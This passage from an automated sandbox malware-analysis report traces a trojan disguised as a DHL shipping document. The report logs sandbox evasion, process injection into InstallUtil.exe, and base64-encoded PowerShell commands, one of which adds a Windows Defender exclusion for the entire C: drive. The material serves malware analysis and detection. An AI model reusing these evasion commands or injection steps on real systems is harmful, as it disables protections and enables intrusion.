                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98894Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98750Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98631Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98511Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98402Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98292Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98171Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98059Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97950Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97835Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97714Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97591Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97482Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97359Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97244Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97140Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97031Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99825Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99711Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99559Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99424Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99297Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99186Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99078Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98968Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98851Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98720Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98527Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98414Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98311Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98200Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98089Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97964Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97851Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97734Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97593Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97462Jump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 100000
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99868
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99734
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99621
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99514
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99398
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99282
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99167
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99036
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98922
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98792
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98687
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98538
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98420
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98310
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98203
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98094
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97976
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97853
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97732
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97625
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97508
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97390
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97264
                  Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477
                  Source: InstallUtil.exe, 00000011.00000002.556971719.00000294206D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: KbWSe.exe, 00000013.00000003.479323373.0000000000891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                  Source: InstallUtil.exe, 00000011.00000002.556971719.00000294206D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware4X7R9VV9Win32_VideoController66XGVD9WVideoController120060621000000.000000-00014.85187display.infMSBDA328S4PUGPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsVV92AOMP
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.545974916.0000000000694000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.556971719.00000294206D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 4C4000Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: E7A101B010Jump to behavior
                  Encrypted powershell cmdline option found
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: Base64 decoded start-sleep -seconds 10
                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded set-mppreference -exclusionpath C:\
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: Base64 decoded start-sleep -seconds 10Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded set-mppreference -exclusionpath C:\Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeThread register set: target process: 1764Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe "C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==Jump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Users\user\Desktop\DHL_Shipping_Document2.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Users\user\AppData\Local\explorers.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Users\user\AppData\Local\explorers.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
